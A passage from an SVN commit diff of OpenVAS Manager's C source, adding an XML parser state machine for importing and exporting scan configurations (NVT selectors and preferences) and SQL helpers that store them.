*/ static void -array_add (GPtrArray *array, gchar* string) +array_add (GPtrArray *array, gpointer pointer) { - if (array) g_ptr_array_add (array, string); + if (array) g_ptr_array_add (array, pointer); } /** @@ -163,18 +163,35 @@ /** * @brief Free global array value. * + * Also g_free any elements. + * * @param[in] array Pointer to array. */ static void free_array (GPtrArray *array) { - int index = 0; - gpointer item; - while ((item = g_ptr_array_index (array, index++))) - g_free (item); - g_ptr_array_free (array, TRUE); + if (array) + { + int index = 0; + gpointer item; + while ((item = g_ptr_array_index (array, index++))) + g_free (item); + g_ptr_array_free (array, TRUE); + } } +/** + * @brief Reset an array. + * + * @param[in] array Pointer to array. + */ +static void +array_reset (array_t **array) +{ + free_array (*array); + *array = make_array (); +} + /** @todo Duplicated from lsc_user.c. */ /** * @brief Checks whether a file is a directory or not. @@ -400,8 +417,119 @@ #define STATUS_SERVICE_DOWN_TEXT "Service temporarily down" +/* Command data passed between parser callbacks. */ + +static gpointer +preference_new (char *name, char *type, char *value, char *nvt_name, + char *nvt_oid, array_t *alts /* gchar. */) +{ + preference_t *preference; + + preference = (preference_t*) g_malloc0 (sizeof (preference_t)); + preference->name = name; + preference->type = type; + preference->value = value; + preference->nvt_name = nvt_name; + preference->nvt_oid = nvt_oid; + preference->alts = alts; + + return preference; +} + +static gpointer +nvt_selector_new (char *name, char *type, int include, char *family_or_nvt) +{ + nvt_selector_t *selector; + + selector = (nvt_selector_t*) g_malloc0 (sizeof (nvt_selector_t)); + selector->name = name; + selector->type = type; + selector->include = include; + selector->family_or_nvt = family_or_nvt; + + return selector; +} + +typedef struct +{ + int import; /* The import element was present. */ + char *comment; + char *name; + array_t *nvt_selectors; /* nvt_selector_t. */ + char *nvt_selector_name; + char *nvt_selector_type; + char *nvt_selector_include; + char *nvt_selector_family_or_nvt; + array_t *preferences; /* preference_t. */ + array_t *preference_alts; /* gchar. */ + char *preference_alt; + char *preference_name; + char *preference_nvt_name; + char *preference_nvt_oid; + char *preference_type; + char *preference_value; +} import_config_data_t; + +typedef struct +{ + import_config_data_t import; +} create_config_data_t; + +// array members must be created separately +void +create_config_data_reset (create_config_data_t *data) +{ + int index = 0; + const preference_t *preference; + import_config_data_t *import = (import_config_data_t*) &data->import; + + free (import->comment); + free (import->name); + free_array (import->nvt_selectors); + free (import->nvt_selector_name); + free (import->nvt_selector_type); + free (import->nvt_selector_family_or_nvt); + + if (import->preferences) + { + while ((preference = (preference_t*) g_ptr_array_index (import->preferences, + index++))) + free_array (preference->alts); + free_array (import->preferences); + } + + free (import->preference_alt); + free (import->preference_name); + free (import->preference_nvt_name); + free (import->preference_nvt_oid); + free (import->preference_type); + free (import->preference_value); + + memset (data, 0, sizeof (create_config_data_t)); +} + +typedef union +{ + create_config_data_t create_config; +} command_data_t; + +void +command_data_init (command_data_t *data) +{ + memset (data, 0, sizeof (command_data_t)); +} + + /* Global variables. */ +command_data_t command_data; + +create_config_data_t *create_config_data + = (create_config_data_t*) &(command_data.create_config); + +import_config_data_t *import_config_data + = (import_config_data_t*) &(command_data.create_config.import); + /** * @brief Hack for returning forked process status from the callbacks. */ @@ -562,6 +690,26 @@ CLIENT_CREATE_CONFIG_COPY, CLIENT_CREATE_CONFIG_NAME, CLIENT_CREATE_CONFIG_RCFILE, + /* get_configs_response (GCR) is used for config export. CLIENT_C_C is + * for CLIENT_CREATE_CONFIG. */ + CLIENT_C_C_GCR, + CLIENT_C_C_GCR_CONFIG, + CLIENT_C_C_GCR_CONFIG_COMMENT, + CLIENT_C_C_GCR_CONFIG_NAME, + CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS, + CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR, + CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_NAME, + CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_INCLUDE, + CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_TYPE, + CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_FAMILY_OR_NVT, + CLIENT_C_C_GCR_CONFIG_PREFERENCES, + CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE, + CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_ALT, + CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NAME, + CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NVT, + CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NVT_NAME, + CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_TYPE, + CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_VALUE, CLIENT_CREATE_ESCALATOR, CLIENT_CREATE_ESCALATOR_COMMENT, CLIENT_CREATE_ESCALATOR_CONDITION, @@ -726,6 +874,7 @@ gchar *msg; gboolean ret; + /** @todo Set gerror so parsing terminates. */ msg = g_strdup_printf ("<%s_response status=\"" STATUS_ERROR_SYNTAX "\" status_text=\"Bogus element: %s\"/>", @@ -1184,7 +1333,7 @@ else current_int_3 = 0; if (find_attribute (attribute_names, attribute_values, - "nvt_selectors", &attribute)) + "export", &attribute)) current_int_4 = atoi (attribute); else current_int_4 = 0; @@ -2134,6 +2283,8 @@ set_client_state (CLIENT_CREATE_CONFIG_COMMENT); else if (strcasecmp ("COPY", element_name) == 0) set_client_state (CLIENT_CREATE_CONFIG_COPY); + else if (strcasecmp ("GET_CONFIGS_RESPONSE", element_name) == 0) + set_client_state (CLIENT_C_C_GCR); else if (strcasecmp ("NAME", element_name) == 0) set_client_state (CLIENT_CREATE_CONFIG_NAME); else if (strcasecmp ("RCFILE", element_name) == 0) @@ -2153,6 +2304,207 @@ } break; + case CLIENT_C_C_GCR: + if (strcasecmp ("CONFIG", element_name) == 0) + { + /* Reset here in case there was a previous config element. */ + create_config_data_reset (create_config_data); + set_client_state (CLIENT_C_C_GCR_CONFIG); + } + else + { + if (send_element_error_to_client ("create_config", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + } + break; + + case CLIENT_C_C_GCR_CONFIG: + if (strcasecmp ("COMMENT", element_name) == 0) + set_client_state (CLIENT_C_C_GCR_CONFIG_COMMENT); + else if (strcasecmp ("NAME", element_name) == 0) + set_client_state (CLIENT_C_C_GCR_CONFIG_NAME); + else if (strcasecmp ("NVT_SELECTORS", element_name) == 0) + { + /* Reset array, in case there was a previous nvt_selectors element. */ + array_reset (&import_config_data->nvt_selectors); + set_client_state (CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS); + } + else if (strcasecmp ("PREFERENCES", element_name) == 0) + { + /* Reset array, in case there was a previous preferences element. */ + array_reset (&import_config_data->preferences); + set_client_state (CLIENT_C_C_GCR_CONFIG_PREFERENCES); + } + else + { + if (send_element_error_to_client ("create_config", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + } + break; + + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS: + if (strcasecmp ("NVT_SELECTOR", element_name) == 0) + set_client_state (CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR); + else + { + if (send_element_error_to_client ("create_config", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + } + break; + + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR: + if (strcasecmp ("INCLUDE", element_name) == 0) + set_client_state + (CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_INCLUDE); + else if (strcasecmp ("NAME", element_name) == 0) + set_client_state + (CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_NAME); + else if (strcasecmp ("TYPE", element_name) == 0) + set_client_state + (CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_TYPE); + else if (strcasecmp ("FAMILY_OR_NVT", element_name) == 0) + set_client_state + (CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_FAMILY_OR_NVT); + else + { + if (send_element_error_to_client ("create_config", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + } + break; + + case CLIENT_C_C_GCR_CONFIG_PREFERENCES: + if (strcasecmp ("PREFERENCE", element_name) == 0) + { + array_reset (&import_config_data->preference_alts); + set_client_state (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE); + } + else + { + if (send_element_error_to_client ("create_config", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + } + break; + + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE: + if (strcasecmp ("ALT", element_name) == 0) + set_client_state + (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_ALT); + else if (strcasecmp ("NAME", element_name) == 0) + set_client_state + (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NAME); + else if (strcasecmp ("NVT", element_name) == 0) + { + const gchar* attribute; + if (find_attribute (attribute_names, attribute_values, + "oid", &attribute)) + openvas_append_string (&(import_config_data->preference_nvt_oid), + attribute); + set_client_state + (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NVT); + } + else if (strcasecmp ("TYPE", element_name) == 0) + set_client_state + (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_TYPE); + else if (strcasecmp ("VALUE", element_name) == 0) + set_client_state + (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_VALUE); + else + { + if (send_element_error_to_client ("create_config", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + } + break; + + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NVT: + if (strcasecmp ("NAME", element_name) == 0) + set_client_state + (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NVT_NAME); + else + { + if (send_element_error_to_client ("create_config", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + } + break; + + case CLIENT_C_C_GCR_CONFIG_COMMENT: + case CLIENT_C_C_GCR_CONFIG_NAME: + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_INCLUDE: + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_NAME: + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_TYPE: + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_FAMILY_OR_NVT: + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_ALT: + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NAME: + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NVT_NAME: + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_TYPE: + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_VALUE: + if (send_element_error_to_client ("create_config", element_name)) + { + error_send_to_client (error); + return; + } + set_client_state (CLIENT_AUTHENTIC); + g_set_error (error, + G_MARKUP_ERROR, + G_MARKUP_ERROR_UNKNOWN_ELEMENT, + "Error"); + break; + case CLIENT_CREATE_ESCALATOR: if (strcasecmp ("COMMENT", element_name) == 0) set_client_state (CLIENT_CREATE_ESCALATOR_COMMENT); @@ -5715,12 +6067,49 @@ assert (strcasecmp ("CREATE_CONFIG", element_name) == 0); assert (modify_task_name != NULL); - if (strlen (modify_task_name) == 0) + /* For now the import element, GET_CONFIGS_RESPONSE, overrides + * any other elements. */ + if (import_config_data->import) { - openvas_free_string_var (&modify_task_comment); - openvas_free_string_var (&modify_task_name); - openvas_free_string_var (&modify_task_value); - openvas_free_string_var (¤t_name); + array_terminate (import_config_data->nvt_selectors); + array_terminate (import_config_data->preferences); + switch (create_config (import_config_data->name, + import_config_data->comment, + import_config_data->nvt_selectors, + import_config_data->preferences)) + { + case 0: + SEND_TO_CLIENT_OR_FAIL (XML_OK_CREATED ("create_config")); + break; + case 1: + SEND_TO_CLIENT_OR_FAIL + (XML_ERROR_SYNTAX ("create_config", + "Config exists already")); + break; + case -1: + SEND_TO_CLIENT_OR_FAIL + (XML_INTERNAL_ERROR ("create_config")); + break; + case -2: + SEND_TO_CLIENT_OR_FAIL + (XML_ERROR_SYNTAX ("create_config", + "CREATE_CONFIG import name must be at" + " least one character long")); + break; + case -3: + SEND_TO_CLIENT_OR_FAIL + (XML_ERROR_SYNTAX ("create_config", + "Error in NVT_SELECTORS element.")); + break; + case -4: + SEND_TO_CLIENT_OR_FAIL + (XML_ERROR_SYNTAX ("create_config", + "Error in PREFERENCES element.")); + break; + } + } + else if (strlen (modify_task_name) == 0) + { SEND_TO_CLIENT_OR_FAIL (XML_ERROR_SYNTAX ("create_config", // FIX could pass an empty rcfile? @@ -5730,10 +6119,6 @@ else if ((modify_task_value && current_name) || (modify_task_value == NULL && current_name == NULL)) { - openvas_free_string_var (&modify_task_comment); - openvas_free_string_var (&modify_task_name); - openvas_free_string_var (&modify_task_value); - openvas_free_string_var (¤t_name); SEND_TO_CLIENT_OR_FAIL (XML_ERROR_SYNTAX ("create_config", "CREATE_CONFIG requires either a COPY or an" @@ -5746,7 +6131,6 @@ guchar *base64; base64 = g_base64_decode (modify_task_value, &base64_len); - openvas_free_string_var (&modify_task_value); /* g_base64_decode can return NULL (Glib 2.12.4-2), at least * when modify_task_value is zero length. */ if (base64 == NULL) @@ -5755,11 +6139,9 @@ base64_len = 0; } - ret = create_config (modify_task_name, - modify_task_comment, - (char*) base64); - openvas_free_string_var (&modify_task_comment); - openvas_free_string_var (&modify_task_name); + ret = create_config_rc (modify_task_name, + modify_task_comment, + (char*) base64); g_free (base64); switch (ret) { @@ -5779,17 +6161,11 @@ } else { - int ret; - assert (current_name); - ret = copy_config (modify_task_name, - modify_task_comment, - current_name); - openvas_free_string_var (&modify_task_comment); - openvas_free_string_var (&modify_task_name); - openvas_free_string_var (¤t_name); - switch (ret) + switch (copy_config (modify_task_name, + modify_task_comment, + current_name)) { case 0: SEND_TO_CLIENT_OR_FAIL (XML_OK_CREATED ("create_config")); @@ -5810,6 +6186,11 @@ break; } } + create_config_data_reset (create_config_data); + openvas_free_string_var (&modify_task_comment); + openvas_free_string_var (&modify_task_name); + openvas_free_string_var (&modify_task_value); + openvas_free_string_var (¤t_name); set_client_state (CLIENT_AUTHENTIC); break; } @@ -5830,6 +6211,121 @@ set_client_state (CLIENT_CREATE_CONFIG); break; + case CLIENT_C_C_GCR: + assert (strcasecmp ("GET_CONFIGS_RESPONSE", element_name) == 0); + import_config_data->import = 1; + set_client_state (CLIENT_CREATE_CONFIG); + break; + case CLIENT_C_C_GCR_CONFIG: + assert (strcasecmp ("CONFIG", element_name) == 0); + set_client_state (CLIENT_C_C_GCR); + break; + case CLIENT_C_C_GCR_CONFIG_COMMENT: + assert (strcasecmp ("COMMENT", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG); + break; + case CLIENT_C_C_GCR_CONFIG_NAME: + assert (strcasecmp ("NAME", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG); + break; + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS: + assert (strcasecmp ("NVT_SELECTORS", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG); + break; + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR: + { + int include; + + assert (strcasecmp ("NVT_SELECTOR", element_name) == 0); + + if (import_config_data->nvt_selector_include + && strcmp (import_config_data->nvt_selector_include, "0") == 0) + include = 0; + else + include = 1; + + array_add (import_config_data->nvt_selectors, + nvt_selector_new + (import_config_data->nvt_selector_name, + import_config_data->nvt_selector_type, + include, + import_config_data->nvt_selector_family_or_nvt)); + + import_config_data->nvt_selector_name = NULL; + import_config_data->nvt_selector_type = NULL; + free (import_config_data->nvt_selector_include); + import_config_data->nvt_selector_include = NULL; + import_config_data->nvt_selector_family_or_nvt = NULL; + + set_client_state (CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS); + break; + } + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_INCLUDE: + assert (strcasecmp ("INCLUDE", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR); + break; + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_NAME: + assert (strcasecmp ("NAME", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR); + break; + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_TYPE: + assert (strcasecmp ("TYPE", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR); + break; + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_FAMILY_OR_NVT: + assert (strcasecmp ("FAMILY_OR_NVT", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES: + assert (strcasecmp ("PREFERENCES", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE: + assert (strcasecmp ("PREFERENCE", element_name) == 0); + array_terminate (import_config_data->preference_alts); + array_add (import_config_data->preferences, + preference_new (import_config_data->preference_name, + import_config_data->preference_type, + import_config_data->preference_value, + import_config_data->preference_nvt_name, + import_config_data->preference_nvt_oid, + import_config_data->preference_alts)); + import_config_data->preference_name = NULL; + import_config_data->preference_type = NULL; + import_config_data->preference_value = NULL; + import_config_data->preference_nvt_name = NULL; + import_config_data->preference_nvt_oid = NULL; + import_config_data->preference_alts = NULL; + set_client_state (CLIENT_C_C_GCR_CONFIG_PREFERENCES); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_ALT: + assert (strcasecmp ("ALT", element_name) == 0); + array_add (import_config_data->preference_alts, + import_config_data->preference_alt); + import_config_data->preference_alt = NULL; + set_client_state (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NAME: + assert (strcasecmp ("NAME", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NVT: + assert (strcasecmp ("NVT", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NVT_NAME: + assert (strcasecmp ("NAME", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NVT); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_TYPE: + assert (strcasecmp ("TYPE", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_VALUE: + assert (strcasecmp ("VALUE", element_name) == 0); + set_client_state (CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE); + break; + case CLIENT_CREATE_ESCALATOR: { event_t event; @@ -6266,7 +6762,7 @@ config_name = g_strdup_printf ("Imported config for task %s", tsk_uuid); - ret = create_config (config_name, NULL, (char*) description); + ret = create_config_rc (config_name, NULL, (char*) description); set_task_config (current_client_task, config_name); g_free (config_name); if (ret) @@ -7350,122 +7846,132 @@ config_families_growing = config_iterator_families_growing (&configs); - SENDF_TO_CLIENT_OR_FAIL ("" - "%s" - "%s" - "" - "%i%i" - "" - /* The number of NVT's selected by - * the selector. */ - "" - "%i%i" - "" - "%i" - "", - config_name, - config_iterator_comment (&configs), - config_family_count (config_name), - config_families_growing, - config_nvt_count (config_name), - config_nvts_growing, - config_in_use (config_name)); - - init_config_task_iterator (&tasks, + if (current_int_4) + /* The "export" attribute was true. */ + SENDF_TO_CLIENT_OR_FAIL ("" + "%s" + "%s", config_name, - /* Attribute sort_order. */ - current_int_2); - while (next (&tasks)) - SENDF_TO_CLIENT_OR_FAIL ("" - "%s" - "", - config_task_iterator_uuid (&tasks), - config_task_iterator_name (&tasks)); - cleanup_iterator (&tasks); - SEND_TO_CLIENT_OR_FAIL (""); - - if (current_int_1) + config_iterator_comment (&configs)); + else { - iterator_t families; - int max_nvt_count = 0, known_nvt_count = 0; + SENDF_TO_CLIENT_OR_FAIL ("" + "%s" + "%s" + "" + "%i%i" + "" + /* The number of NVT's selected by + * the selector. */ + "" + "%i%i" + "" + "%i" + "", + config_name, + config_iterator_comment (&configs), + config_family_count (config_name), + config_families_growing, + config_nvt_count (config_name), + config_nvts_growing, + config_in_use (config_name)); - /* The "families" attribute was true. */ + init_config_task_iterator (&tasks, + config_name, + /* Attribute sort_order. */ + current_int_2); + while (next (&tasks)) + SENDF_TO_CLIENT_OR_FAIL ("" + "%s" + "", + config_task_iterator_uuid (&tasks), + config_task_iterator_name (&tasks)); + cleanup_iterator (&tasks); + SEND_TO_CLIENT_OR_FAIL (""); - SENDF_TO_CLIENT_OR_FAIL (""); - init_family_iterator (&families, - config_families_growing, - selector, - /* Attribute sort_order. */ - current_int_2); - while (next (&families)) + if (current_int_1) { - int family_growing, family_max, family_selected_count; - const char *family; + iterator_t families; + int max_nvt_count = 0, known_nvt_count = 0; - family = family_iterator_name (&families); - if (family) + /* The "families" attribute was true. */ + + SENDF_TO_CLIENT_OR_FAIL (""); + init_family_iterator (&families, + config_families_growing, + selector, + /* Attribute sort_order. */ + current_int_2); + while (next (&families)) { - family_growing = nvt_selector_family_growing - (selector, - family, - config_families_growing); - family_max = family_nvt_count (family); - family_selected_count = nvt_selector_nvt_count - (selector, - family, - family_growing); - known_nvt_count += family_selected_count; + int family_growing, family_max, family_selected_count; + const char *family; + + family = family_iterator_name (&families); + if (family) + { + family_growing = nvt_selector_family_growing + (selector, + family, + config_families_growing); + family_max = family_nvt_count (family); + family_selected_count = nvt_selector_nvt_count + (selector, + family, + family_growing); + known_nvt_count += family_selected_count; + } + else + { + /* The family can be NULL if an RC adds an NVT to a + * config and the NVT is missing from the NVT + * cache. */ + family_growing = 0; + family_max = -1; + family_selected_count = nvt_selector_nvt_count + (selector, NULL, 0); + } + + SENDF_TO_CLIENT_OR_FAIL + ("" + "%s" + /* The number of selected NVT's. */ + "%i" + /* The total number of NVT's in the family. */ + "%i" + "%i" + "", + family ? family : "", + family_selected_count, + family_max, + family_growing); + if (family_max > 0) + max_nvt_count += family_max; } - else - { - /* The family can be NULL if an RC adds an NVT to a - * config and the NVT is missing from the NVT - * cache. */ - family_growing = 0; - family_max = -1; - family_selected_count = nvt_selector_nvt_count - (selector, NULL, 0); - } - - SENDF_TO_CLIENT_OR_FAIL - ("" - "%s" - /* The number of selected NVT's. */ - "%i" - /* The total number of NVT's in the family. */ - "%i" - "%i" - "", - family ? family : "", - family_selected_count, - family_max, - family_growing); - if (family_max > 0) - max_nvt_count += family_max; + cleanup_iterator (&families); + SENDF_TO_CLIENT_OR_FAIL ("" + /* The total number of NVT's in all + * the families for which the + * selector selects at least one + * NVT. */ + "%i" + /* Total number of selected known + * NVT's. */ + "" + "%i" + "", + max_nvt_count, + known_nvt_count); } - cleanup_iterator (&families); - SENDF_TO_CLIENT_OR_FAIL ("" - /* The total number of NVT's in all - * the families for which the - * selector selects at least one - * NVT. */ - "%i" - /* Total number of selected known - * NVT's. */ - "" - "%i" - "", - max_nvt_count, - known_nvt_count); - } + } - if (current_int_3) + if (current_int_3 || current_int_4) { iterator_t prefs; /** @todo Similar to block in CLIENT_GET_NVT_DETAILS. */ - /* The "preferences" attribute was true. */ + /* The "preferences" and/or "export" attribute was true. */ SEND_TO_CLIENT_OR_FAIL (""); @@ -7528,7 +8034,7 @@ { iterator_t selectors; - /* The "nvt_selectors" attribute was true. */ + /* The "export" attribute was true. */ SEND_TO_CLIENT_OR_FAIL (""); @@ -8035,6 +8541,62 @@ openvas_append_text (&modify_task_value, text, text_len); break; + case CLIENT_C_C_GCR_CONFIG_COMMENT: + openvas_append_text (&(import_config_data->comment), + text, + text_len); + break; + case CLIENT_C_C_GCR_CONFIG_NAME: + openvas_append_text (&(import_config_data->name), + text, + text_len); + break; + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_INCLUDE: + openvas_append_text (&(import_config_data->nvt_selector_include), + text, + text_len); + break; + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_NAME: + openvas_append_text (&(import_config_data->nvt_selector_name), + text, + text_len); + break; + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_TYPE: + openvas_append_text (&(import_config_data->nvt_selector_type), + text, + text_len); + break; + case CLIENT_C_C_GCR_CONFIG_NVT_SELECTORS_NVT_SELECTOR_FAMILY_OR_NVT: + openvas_append_text (&(import_config_data->nvt_selector_family_or_nvt), + text, + text_len); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_ALT: + openvas_append_text (&(import_config_data->preference_alt), + text, + text_len); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NAME: + openvas_append_text (&(import_config_data->preference_name), + text, + text_len); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_NVT_NAME: + openvas_append_text (&(import_config_data->preference_nvt_name), + text, + text_len); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_TYPE: + openvas_append_text (&(import_config_data->preference_type), + text, + text_len); + break; + case CLIENT_C_C_GCR_CONFIG_PREFERENCES_PREFERENCE_VALUE: + openvas_append_text (&(import_config_data->preference_value), + text, + text_len); + break; + case CLIENT_CREATE_LSC_CREDENTIAL_COMMENT: openvas_append_text (&modify_task_comment, text, text_len); break; @@ -8177,6 +8739,7 @@ ALL_LOG_LEVELS, (GLogFunc) openvas_log_func, log_config); + command_data_init (&command_data); return init_manage (log_config, nvt_cache_mode, database); } Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2010-01-05 17:50:28 UTC (rev 6313) +++ trunk/openvas-manager/src/tasks_sql.h 2010-01-05 19:53:07 UTC (rev 6314) @@ -6057,6 +6057,213 @@ /* Configs. */ /** + * @brief Insert NVT selectors. + * + * @param[in] quoted_name Name of NVT selector. + * @param[in] selectors NVT selectors. + * + * @return 0 success, -1 error, -3 input error. + */ +static int +insert_nvt_selectors (const char *quoted_name, + const array_t* selectors /* nvt_selector_t. */) +{ + int index = 0; + const nvt_selector_t *selector; + if (selectors == NULL) return -3; + while ((selector = (nvt_selector_t*) g_ptr_array_index (selectors, index++))) + { + if (selector->type == NULL) return -3; + + if (selector->family_or_nvt) + { + char *quoted_family_or_nvt = sql_quote (selector->family_or_nvt); + sql ("INSERT into nvt_selectors (name, exclude, type, family_or_nvt)" + " VALUES ('%s', %i, %i, '%s');", + quoted_name, + selector->include ? 0 : 1, + /** @todo Check this is in range. */ + atoi (selector->type), + quoted_family_or_nvt); + g_free (quoted_family_or_nvt); + } + else + sql ("INSERT into nvt_selectors (name, exclude, type, family_or_nvt)" + " VALUES ('%s', %i, %i, NULL);", + quoted_name, + selector->include ? 0 : 1, + /** @todo Check this is in range. */ + atoi (selector->type)); + } + return 0; +} + +/** + * @brief Insert preferences into a config. + * + * @param[in] config Config. + * @param[in] preferences Preferences. + * + * @return 0 success, -1 error, -4 input error. + */ +static int +config_insert_preferences (config_t config, + const array_t* preferences /* preference_t. */) +{ + int index = 0; + const preference_t *preference; + if (preferences == NULL) return -4; + while ((preference = (preference_t*) g_ptr_array_index (preferences, index++))) + /* Simply skip the preference if the value is NULL, for exports + * where sensitive information is left out. */ + if (preference->value) + { + GString *value; + int alt_index = 0; + const gchar *alt; + gchar *quoted_value; + + if (preference->name == NULL) return -4; + if (preference->type) + { + gchar *quoted_type, *quoted_nvt_name, *quoted_preference_name; + + /* Presume NVT preference. */ + + if (preference->nvt_name == NULL) return -4; + + value = g_string_new (preference->value); + while ((alt = (gchar*) g_ptr_array_index (preference->alts, alt_index++))) + g_string_append_printf (value, ";%s", alt); + + quoted_nvt_name = sql_quote (preference->name); + quoted_preference_name = sql_quote (preference->name); + quoted_type = sql_quote (preference->type); + quoted_value = sql_quote (value->str); + g_string_free (value, TRUE); + /* LDAPsearch[entry]:Timeout value */ + sql ("INSERT into config_preferences (config, type, name, value)" + " VALUES (%llu, 'PLUGINS_PREFS', '%s[%s]:%s', '%s');", 